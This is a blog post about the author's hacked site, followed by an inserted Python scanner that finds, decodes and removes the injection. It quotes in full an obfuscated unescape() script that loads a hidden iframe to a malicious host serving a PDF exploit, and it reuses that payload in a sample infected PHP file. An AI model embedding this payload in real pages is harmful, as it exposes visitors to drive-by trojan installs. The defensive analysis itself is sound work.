Quick update. My site was hacked a few days ago and it was just now fixed, which is why I haven’t posted anything in a few days. Big thanks to the guys over at Blue Sail Creative for getting everything resolved within 24 hours! I actually didn’t know my site was hacked until a few days ago. I was at CES and thought I was having problems due to the horrible internet connection there, but I was wrong. Here is what I was told about the hack, which apparently added some crazy code to all of my .php pages:
“There’s something injecting a script at the bottom of your page
unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%72%65%65%6E%6C%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B")
when we decoded that, it's including an iframe to greenlpl.com/in.php
Apparently the code points to a php script that points to another website, which then tries to load an embedded version of a PDF document. This document contains one of the recent pdf javascript exploits, which results in remote code execution. Taking a look at the pdf, it seems to contain some obfuscated assembly code. Users who use an outdated version of adobe reader are vulnerable, but even the most recent reader has some unpatched vulnerabilities. Foxit reader should be safe, and people who use Firefox with addons such as NoScript or RequestPolicy should also be safe.
The attack is of a Chinese origin.
According to some anti-virus websites (i.e. here) this attack downloads a couple of binary files and then executes them, installing a trojan on the affected system. Guys, have your computers scanned!
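For anyone who wants to check their own site for the same thing, here is a small scanner that does the decoding Blue Sail Creative describes: it finds `<script>` blocks that call `unescape()` on a fully percent-encoded string, decodes them the way a browser would, reports the iframe `src` the payload writes, and can strip the blocks out. This is an added example, not code from this post or from Blue Sail Creative. It assumes the injection was wrapped as `<script>eval(unescape("…"))</script>` (the post shows only the `unescape()` call), and the sample PHP file below is constructed for the demonstration, using the payload quoted above.

```python
import os
import re

# Payload copied verbatim from the post. The <script>/eval() wrapper around it
# is an assumption: the post shows only the unescape() call.
PAYLOAD = (
    "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20"
    "%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%72%65%65%6E%6C%70%6C%2E%63%6F%6D"
    "%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D"
    "%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65"
    "%3E%27%29%3B"
)

# Constructed sample of an infected .php page: legitimate includes and a
# legitimate <script src=...> tag, with the injection appended at the bottom.
SAMPLE_PHP = (
    "<?php include 'header.php'; ?>\n"
    "<p>Welcome back from CES.</p>\n"
    '<script src="/js/site.js"></script>\n'
    "<?php include 'footer.php'; ?>\n"
    f'<script>eval(unescape("{PAYLOAD}"))</script>\n'
)

# A <script> block whose body passes a string made entirely of %XX / %uXXXX
# escapes to unescape(). Legitimate code almost never does that, so this is a
# narrow, low-false-positive signature for this family of injections.
INJECT_RE = re.compile(
    r'<script[^>]*>(?:(?!</script>).)*?'
    r'unescape\(\s*["\']((?:%u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2})+)["\']\s*\)'
    r'(?:(?!</script>).)*?</script>[ \t]*\r?\n?',
    re.IGNORECASE | re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*?\bsrc=["\']?([^"\'\s>]+)', re.IGNORECASE)


def js_unescape(s):
    """Replicate JavaScript's unescape(): %uXXXX and %XX each become one code
    unit (no UTF-8 decoding, unlike urllib.parse.unquote); anything else is literal."""
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def find_injections(text):
    """Return one dict per injected block: the encoded string, the decoded
    JavaScript, and the iframe src it writes (None if it writes no iframe)."""
    findings = []
    for m in INJECT_RE.finditer(text):
        decoded = js_unescape(m.group(1))
        src = IFRAME_SRC_RE.search(decoded)
        findings.append({"encoded": m.group(1), "decoded": decoded,
                         "iframe_src": src.group(1) if src else None})
    return findings


def clean(text):
    """Strip the injected script blocks. Returns (cleaned_text, blocks_removed)."""
    return INJECT_RE.subn("", text)


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a site root and yield (path, findings) for every infected file.
    Reports only; rewrite files with clean() once you have a backup."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    yield path, hits


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_PHP):
        print("injected iframe ->", hit["iframe_src"])
        print("decoded JS      ->", hit["decoded"])
    cleaned, removed = clean(SAMPLE_PHP)
    print(f"removed {removed} injected block(s); {len(cleaned)} bytes of page remain")
```

Point `scan_tree()` at a copy of the web root and review the decoded JavaScript before trusting any cleanup: the signature is deliberately narrow, so a variant that uses a different wrapper or splits the string will need the regex widened. Also keep in mind that if every .php file on the site was rewritten, whoever did it had write access to the document root; cleaning the files does not close that, so change the credentials and update whatever software could have been used to write them before putting the site back.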
If anyone is having any issues with their site or is looking for some great design/development work at an affordable price I recommend contacting Blue Sail Creative directly on twitter.
Thanks guys!